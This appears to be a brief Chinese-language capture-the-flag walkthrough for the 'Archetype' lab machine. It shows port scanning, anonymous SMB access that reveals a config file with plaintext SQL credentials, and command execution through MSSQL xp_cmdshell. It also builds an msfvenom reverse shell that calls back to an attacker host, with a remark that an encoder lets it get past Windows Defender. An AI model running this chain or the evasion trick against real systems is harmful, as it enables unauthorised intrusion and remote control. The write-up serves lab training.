掃 Port

  • rustscan -a 10.10.10.27 -r 1-65535nmap 繼續掃- nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
  • 一堆的 RPC
  • SMB
  • 1433 是 MSSQL

SMB

  • SMB 匿名登入
  • 發現 backupsbackups 資料夾- 一個 Config 載下來取得密碼資訊-
  • Host Name : ARCHETYPE
  • User ID : sql_svc
  • Password : M3g4c0rp123

MSSQL

  • 安裝 impacketsudo apt install python3-impacket``impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth- MSSQL 取得 Shell 就有機會可以 RCE- exec xp_cmdshell '{指令}'``systeminfo- dir- exec xp_cmdshell 'dir'透過開啟本地 smb- impacket-smbserver meow .準備 Reverse shell- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe經測試,不掛 x86/shikata_ga_nai 就會被 Defender 吃掉

Shell

  • 執行 Shellexec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
  • 收回 Reverse shell- 取得 User Flag